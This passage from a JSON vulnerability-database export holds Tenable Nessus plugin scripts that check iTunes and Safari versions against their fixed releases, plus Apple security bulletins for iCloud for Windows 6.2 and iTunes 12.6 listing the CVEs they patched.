script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119, 399);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/01/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Peer-To-Peer File Sharing\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"itunes_sharing.nasl\");\n script_require_keys(\"iTunes/sharing\");\n script_require_ports(\"Services/www\", 3689);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:3689, embedded:TRUE, ignore_broken:TRUE);\n\nget_kb_item_or_exit(\"iTunes/\" + port + \"/enabled\");\n\ntype = get_kb_item_or_exit(\"iTunes/\" + port + \"/type\");\nsource = get_kb_item_or_exit(\"iTunes/\" + port + \"/source\");\nversion = get_kb_item_or_exit(\"iTunes/\" + port + \"/version\");\n\nif (type == 'AppleTV') audit(AUDIT_OS_NOT, \"Windows or Mac OS\");\n\nfixed_version = \"12.6\";\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) < 0)\n{\n report = '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE, xss:TRUE);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"iTunes\", port, version);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-01-11T14:22:53", "description": "The version of Apple Safari installed on the remote macOS or Mac OS X 
host is prior to 10.1. It is, therefore, affected by multiple vulnerabilities:\n\n - An out-of-bounds read error exists in WebKit when handling certain JavaScript code. An unauthenticated, remote attacker can exploit this to cause a denial of service condition or the disclosure of memory contents.\n (CVE-2016-9642)\n\n - A denial of service vulnerability exists in WebKit when handling certain regular expressions. An unauthenticated, remote attacker can exploit this, via a specially crafted web page, to exhaust available memory resources. (CVE-2016-9643)\n\n - Multiple information disclosure vulnerabilities exist in WebKit when handling page loading due to improper validation of certain input. An unauthenticated, remote attacker can exploit these to disclose data cross-origin. (CVE-2017-2364, CVE-2017-2367)\n\n - An unspecified state management flaw exists that allows an unauthenticated, remote attacker to spoof the address bar. (CVE-2017-2376)\n\n - A denial of service vulnerability exists in the Web Inspector component when closing a window while the debugger is paused. An unauthenticated, remote attacker can exploit this to terminate the application.\n (CVE-2017-2377)\n\n - An unspecified flaw exists in WebKit when creating bookmarks using drag-and-drop due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via a specially crafted link, to spoof bookmarks or potentially execute arbitrary code.\n (CVE-2017-2378)\n\n - An information disclosure vulnerability exists in the Login AutoFill component that allows a local attacker to access keychain items. (CVE-2017-2385)\n\n - Multiple information disclosure vulnerabilities exist in WebKit when handling unspecified exceptions or elements. An unauthenticated, remote attacker can exploit these, via specially crafted web content, to disclose data cross-origin. 
(CVE-2017-2386, CVE-2017-2479, CVE-2017-2480)\n\n - An unspecified flaw exists in the handling of HTTP authentication that allows an unauthenticated, remote attacker to disclose authentication sheets on arbitrary websites or cause a denial of service condition.\n (CVE-2017-2389)\n\n - Multiple memory corruption issues exist in WebKit that allow an unauthenticated, remote attacker to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2394, CVE-2017-2395, CVE-2017-2396, CVE-2017-2433, CVE-2017-2454, CVE-2017-2455, CVE-2017-2459, CVE-2017-2460, CVE-2017-2464, CVE-2017-2465, CVE-2017-2466, CVE-2017-2468, CVE-2017-2469, CVE-2017-2470, CVE-2017-2476)\n\n - A memory corruption issue exists in WebKit within the Web Inspector component due to improper validation of certain input. An unauthenticated, remote attacker can exploit this to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2405)\n\n - An unspecified type confusion error exists that allows an unauthenticated remote attacker to execute arbitrary code by using specially crafted web content.\n (CVE-2017-2415)\n\n - A security bypass vulnerability exists in WebKit that allows an unauthenticated, remote attacker to bypass the Content Security Policy by using specially crafted web content. (CVE-2017-2419)\n\n - An unspecified flaw exists in WebKit when handling OpenGL shaders that allows an unauthenticated, remote attacker to disclose process memory content by using specially crafted web content. (CVE-2017-2424)\n\n - An information disclosure vulnerability exists in WebKit JavaScript Bindings when handling page loading due to unspecified logic flaws. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to disclose data cross-origin. (CVE-2017-2442)\n\n - A memory corruption issue exists in WebKit within the CoreGraphics component due to improper validation of certain input. 
An unauthenticated, remote attacker can exploit this, via specially crafted web content, to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2444)\n\n - A universal cross-site scripting (XSS) vulnerability exists in WebKit when handling frame objects due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to execute arbitrary script code in a user's browser session. (CVE-2017-2445)\n\n - A flaw exists in WebKit due to non-strict mode functions that are called from built-in strict mode scripts not being properly restricted from calling sensitive native functions. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to execute arbitrary code. (CVE-2017-2446)\n\n - An out-of-bounds read error exists in WebKit when handling the bound arguments array of a bound function.\n An unauthenticated, remote attacker can exploit this, via specially crafted web content, to disclose memory contents. (CVE-2017-2447)\n\n - An unspecified flaw exists in FaceTime prompt handling due to improper validation of certain input. An unauthenticated, remote attacker can exploit this to spoof user interface elements. (CVE-2017-2453)\n\n - A use-after-free error exists in WebKit when handling RenderBox objects. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to dereference already freed memory, resulting in the execution of arbitrary code. (CVE-2017-2463)\n\n - An unspecified use-after-free error exists in WebKit that allows an unauthenticated, remote attacker, via specially crafted web content, to dereference already freed memory, resulting in the execution of arbitrary code. (CVE-2017-2471)\n\n - A universal cross-site scripting (XSS) vulnerability exists in WebKit when handling frames due to improper validation of certain input. 
An unauthenticated, remote attacker can exploit this, via specially crafted web content, to execute arbitrary script code in a user's browser session. (CVE-2017-2475)\n\n - A use-after-free error exists in WebKit when handling ElementData objects. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to dereference already freed memory, resulting in the execution of arbitrary code. (CVE-2017-2481)\n\n - A use-after-free error exists in JavaScriptCore when handling the String.replace() method. An unauthenticated, remote attacker can exploit this to dereference already freed memory, resulting in the execution of arbitrary code. (CVE-2017-2491)\n\n - A universal cross-site scripting (XSS) vulnerability exists in JavaScriptCore due to an unspecified prototype flaw. An unauthenticated, remote attacker can exploit this, via a specially crafted web page, to execute arbitrary code in a user's browser session.\n (CVE-2017-2492)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-03T00:00:00", "type": "nessus", "title": "macOS : Apple Safari < 10.1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9642", "CVE-2016-9643", "CVE-2017-2364", "CVE-2017-2367", "CVE-2017-2376", "CVE-2017-2377", "CVE-2017-2378", "CVE-2017-2385", "CVE-2017-2386", "CVE-2017-2389", "CVE-2017-2392", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2405", "CVE-2017-2415", "CVE-2017-2419", "CVE-2017-2424", "CVE-2017-2433", "CVE-2017-2442", "CVE-2017-2444", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2453", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2457", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2463", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2471", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2481", "CVE-2017-2486", "CVE-2017-2491", "CVE-2017-2492", "CVE-2017-2493", "CVE-2017-7071"], "modified": "2019-07-03T00:00:00", "cpe": ["cpe:/a:apple:safari", "cpe:/o:apple:mac_os_x"], "id": "MACOSX_SAFARI10_1.NASL", "href": "https://www.tenable.com/plugins/nessus/99167", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99167);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/07/03 12:01:40\");\n\n script_cve_id(\n \"CVE-2016-9642\",\n \"CVE-2016-9643\",\n \"CVE-2017-2364\",\n \"CVE-2017-2367\",\n \"CVE-2017-2376\",\n \"CVE-2017-2377\",\n \"CVE-2017-2378\",\n \"CVE-2017-2385\",\n \"CVE-2017-2386\",\n \"CVE-2017-2389\",\n \"CVE-2017-2392\",\n \"CVE-2017-2394\",\n \"CVE-2017-2395\",\n \"CVE-2017-2396\",\n \"CVE-2017-2405\",\n \"CVE-2017-2415\",\n \"CVE-2017-2419\",\n \"CVE-2017-2424\",\n \"CVE-2017-2433\",\n \"CVE-2017-2442\",\n \"CVE-2017-2444\",\n \"CVE-2017-2445\",\n \"CVE-2017-2446\",\n \"CVE-2017-2447\",\n \"CVE-2017-2453\",\n \"CVE-2017-2454\",\n \"CVE-2017-2455\",\n \"CVE-2017-2457\",\n \"CVE-2017-2459\",\n \"CVE-2017-2460\",\n \"CVE-2017-2463\",\n \"CVE-2017-2464\",\n \"CVE-2017-2465\",\n \"CVE-2017-2466\",\n 
\"CVE-2017-2468\",\n \"CVE-2017-2469\",\n \"CVE-2017-2470\",\n \"CVE-2017-2471\",\n \"CVE-2017-2475\",\n \"CVE-2017-2476\",\n \"CVE-2017-2479\",\n \"CVE-2017-2480\",\n \"CVE-2017-2481\",\n \"CVE-2017-2486\",\n \"CVE-2017-2491\",\n \"CVE-2017-2492\",\n \"CVE-2017-2493\",\n \"CVE-2017-7071\"\n );\n script_bugtraq_id(\n 100613,\n 94554,\n 94559,\n 95725,\n 97129,\n 97130,\n 97131,\n 97133,\n 97136,\n 97140,\n 97143,\n 97147,\n 97176,\n 98316,\n 98700\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-03-27-2\");\n\n script_name(english:\"macOS : Apple Safari < 10.1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the Safari version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS or Mac OS X host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple Safari installed on the remote macOS or Mac OS X \nhost is prior to 10.1. It is, therefore, affected by multiple\nvulnerabilities:\n\n - An out-of-bounds read error exists in WebKit when\n handling certain JavaScript code. An unauthenticated,\n remote attacker can exploit this to cause a denial of\n service condition or the disclosure of memory contents.\n (CVE-2016-9642)\n\n - A denial of service vulnerability exists in WebKit when\n handling certain regular expressions. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted web page, to exhaust available memory\n resources. (CVE-2016-9643)\n\n - Multiple information disclosure vulnerabilities exist\n in WebKit when handling page loading due to improper\n validation of certain input. An unauthenticated, remote\n attacker can exploit these to disclose data\n cross-origin. (CVE-2017-2364, CVE-2017-2367)\n\n - An unspecified state management flaw exists that allows\n an unauthenticated, remote attacker to spoof the address\n bar. 
(CVE-2017-2376)\n\n - A denial of service vulnerability exists in the Web\n Inspector component when closing a window while the\n debugger is paused. An unauthenticated, remote attacker\n can exploit this to terminate the application.\n (CVE-2017-2377)\n\n - An unspecified flaw exists in WebKit when creating\n bookmarks using drag-and-drop due to improper validation\n of certain input. An unauthenticated, remote attacker\n can exploit this, via a specially crafted link, to spoof\n bookmarks or potentially execute arbitrary code.\n (CVE-2017-2378)\n\n - An information disclosure vulnerability exists in the\n Login AutofFill component that allows a local attacker\n to access keychain items. (CVE-2017-2385)\n\n - Multiple information disclosure vulnerabilities exist\n in WebKit when handling unspecified exceptions or\n elements. An unauthenticated, remote attacker can\n exploit these, via specially crafted web content, to\n disclose data cross-origin. (CVE-2017-2386,\n CVE-2017-2479, CVE-2017-2480)\n\n - An unspecified flaw exists in the handling of HTTP\n authentication that allows an unauthenticated, remote\n attacker to disclose authentication sheets on arbitrary\n websites or cause a denial of service condition.\n (CVE-2017-2389)\n\n - Multiple memory corruption issues exist in WebKit that\n allow an unauthenticated, remote attacker to cause a\n denial of service condition or the execution of\n arbitrary code. (CVE-2017-2394, CVE-2017-2395,\n CVE-2017-2396, CVE-2017-2433, CVE-2017-2454,\n CVE-2017-2455, CVE-2017-2459, CVE-2017-2460,\n CVE-2017-2464, CVE-2017-2465, CVE-2017-2466,\n CVE-2017-2468, CVE-2017-2469, CVE-2017-2470,\n CVE-2017-2476)\n\n - A memory corruption issue exists in WebKit within the\n Web Inspector component due to improper validation of\n certain input. An unauthenticated, remote attacker can\n exploit this to cause a denial of service condition or\n the execution of arbitrary code. 
(CVE-2017-2405)\n\n - An unspecified type confusion error exists that allows\n an unauthenticated remote attacker to execute arbitrary\n code by using specially crafted web content.\n (CVE-2017-2415)\n\n - A security bypass vulnerability exists in WebKit that\n allows an unauthenticated, remote attacker to bypass the\n Content Security Policy by using specially crafted web\n content. (CVE-2017-2419)\n\n - An unspecified flaw exists in WebKit when handling\n OpenGL shaders that allows an unauthenticated, remote\n attacker to disclose process memory content by using\n specially crafted web content. (CVE-2017-2424)\n\n - An information disclosure vulnerability exists in WebKit\n JavaScript Bindings when handling page loading due to\n unspecified logic flaws. An unauthenticated, remote\n attacker can exploit this, via specially crafted web\n content, to disclose data cross-origin. (CVE-2017-2442)\n\n - A memory corruption issue exists in WebKit within the\n CoreGraphics component due to improper validation of\n certain input. An unauthenticated, remote attacker can\n exploit this, via specially crafted web content, to\n cause a denial of service condition or the execution of\n arbitrary code. (CVE-2017-2444)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in WebKit when handling frame objects due to\n improper validation of certain input. An\n unauthenticated, remote attacker can exploit this, via\n specially crafted web content, to execute arbitrary\n script code in a user's browser session. (CVE-2017-2445)\n\n - A flaw exists in WebKit due to non-strict mode functions\n that are called from built-in strict mode scripts not\n being properly restricted from calling sensitive native\n functions. An unauthenticated, remote attacker can\n exploit this, via specially crafted web content, to\n execute arbitrary code. 
(CVE-2017-2446)\n\n - An out-of-bounds read error exists in WebKit when\n handling the bound arguments array of a bound function.\n An unauthenticated, remote attacker can exploit this,\n via specially crafted web content, to disclose memory\n contents. (CVE-2017-2447)\n\n - An unspecified flaw exists in FaceTime prompt handling\n due to improper validation of certain input. An\n unauthenticated, remote attacker can exploit this to\n spoof user interface elements. (CVE-2017-2453)\n\n - A use-after-free error exists in WebKit when handling\n RenderBox objects. An unauthenticated, remote attacker\n can exploit this, via specially crafted web content, to\n dereference already freed memory, resulting in the\n execution of arbitrary code. (CVE-2017-2463)\n\n - An unspecified use-after-free error exists in WebKit\n that allows an unauthenticated, remote attacker, via\n specially crafted web content, to dereference already\n freed memory, resulting in the execution of arbitrary\n code. (CVE-2017-2471)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in WebKit when handling frames due to improper\n validation of certain input. An unauthenticated, remote\n attacker can exploit this, via specially crafted web\n content, to execute arbitrary script code in a user's\n browser session. (CVE-2017-2475)\n\n - A use-after-free error exists in WebKit when handling\n ElementData objects. An unauthenticated, remote attacker\n can exploit this, via specially crafted web content, to\n dereference already freed memory, resulting in the\n execution of arbitrary code. (CVE-2017-2481)\n\n - A use-after-free error exists in JavaScriptCore when\n handling the String.replace() method. An\n unauthenticated, remote attacker can exploit this to\n deference already freed memory, resulting in the\n execution of arbitrary code. (CVE-2017-2491)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in JavaScriptCore due to an unspecified prototype\n flaw. 
An unauthenticated, remote attacker can exploit\n this, via a specially crafted web page, to execute\n arbitrary code in a user's browser session.\n (CVE-2017-2492)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207600\");\n # https://lists.apple.com/archives/security-announce/2017/Mar/msg00003.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b6d82a85\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple Safari version 10.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-2378\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/10/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:safari\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_apple_safari_installed.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"MacOSX/Safari/Installed\");\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nos = get_kb_item('Host/MacOSX/Version');\nif (!os) audit(AUDIT_OS_NOT, 'Mac OS X or macOS');\n\nif (!preg(pattern:\"Mac OS X 10\\.(10|11|12)([^0-9]|$)\", string:os))\n audit(AUDIT_OS_NOT, 'Mac OS X Yosemite 10.10 / Mac OS X El Capitan 10.11 / macOS Sierra 10.12');\n\nget_kb_item_or_exit('MacOSX/Safari/Installed', exit_code:0);\npath = get_kb_item_or_exit('MacOSX/Safari/Path', exit_code:1);\nversion = get_kb_item_or_exit('MacOSX/Safari/Version', exit_code:1);\n\nfixed_version = '10.1';\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n report = report_items_str(\n report_items:make_array(\n 'Path', path,\n 'Installed version', version,\n 'Fixed version', fixed_version\n ),\n ordered_fields:make_list('Path', 'Installed version', 'Fixed version')\n );\n security_report_v4(port:0, severity:SECURITY_WARNING, extra:report);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, 'Safari', version, path);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "apple": [{"lastseen": "2021-11-10T17:00:51", "description": "# About the security content of iCloud for Windows 6.2\n\nThis document describes the security content of iCloud for Windows 6.2.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. 
Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iCloud for Windows 6.2\n\nReleased March 28, 2017\n\n**APNs Server**\n\nAvailable for: Windows 7 and later\n\nImpact: An attacker in a privileged network position can track a user's activity\n\nDescription: A client certificate was sent in plaintext. This issue was addressed through improved certificate handling.\n\nCVE-2017-2383: Matthias Wachs and Quirin Scheitle of Technical University Munich (TUM)\n\n**libxslt**\n\nAvailable for: Windows 7 and later\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. 
This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: April 24, 2017\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-28T00:00:00", "type": "apple", "title": "About the security content of iCloud for Windows 6.2", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2383", "CVE-2017-2463", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2493", "CVE-2017-5029"], "modified": "2017-03-28T00:00:00", "id": 
"APPLE:20D403FA17FFAFBF6C005DAD59ACB4F6", "href": "https://support.apple.com/kb/HT207607", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-24T20:42:27", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iCloud for Windows 6.2\n\nReleased March 28, 2017\n\n**APNs Server**\n\nAvailable for: Windows 7 and later\n\nImpact: An attacker in a privileged network position can track a user's activity\n\nDescription: A client certificate was sent in plaintext. 
This issue was addressed through improved certificate handling.\n\nCVE-2017-2383: Matthias Wachs and Quirin Scheitle of Technical University Munich (TUM)\n\n**libxslt**\n\nAvailable for: Windows 7 and later\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-04-24T06:47:37", "title": "About the security content of iCloud for Windows 6.2 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", 
"confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2479", "CVE-2017-2480", "CVE-2017-5029", "CVE-2017-2463", "CVE-2017-2493", "CVE-2017-2383"], "modified": "2017-04-24T06:47:37", "id": "APPLE:HT207607", "href": "https://support.apple.com/kb/HT207607", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-24T20:44:14", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iTunes 12.6 for Windows\n\nReleased March 21, 2017\n\n**APNs Server**\n\nAvailable for: Windows 7 and later\n\nImpact: An attacker in a privileged network position can track a user's activity\n\nDescription: A client certificate was sent in plaintext. This issue was addressed through improved certificate handling.\n\nCVE-2017-2383: Matthias Wachs and Quirin Scheitle of Technical University Munich (TUM)\n\nEntry added March 28, 2017\n\n**iTunes**\n\nAvailable for: Windows 7 and later\n\nImpact: Multiple issues in SQLite\n\nDescription: Multiple issues existed in SQLite. 
These issues were addressed by updating SQLite to version 3.15.2.\n\nCVE-2013-7443\n\nCVE-2015-3414\n\nCVE-2015-3415\n\nCVE-2015-3416\n\nCVE-2015-3717\n\nCVE-2015-6607\n\nCVE-2016-6153\n\n**iTunes**\n\nAvailable for: Windows 7 and later\n\nImpact: Multiple issues in expat\n\nDescription: Multiple issues existed in expat. These issues were addressed by updating expat to version 2.2.0.\n\nCVE-2009-3270\n\nCVE-2009-3560\n\nCVE-2009-3720\n\nCVE-2012-1147\n\nCVE-2012-1148\n\nCVE-2012-6702\n\nCVE-2015-1283\n\nCVE-2016-0718\n\nCVE-2016-4472\n\nCVE-2016-5300\n\n**libxslt**\n\nAvailable for: Windows 7 and later\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. 
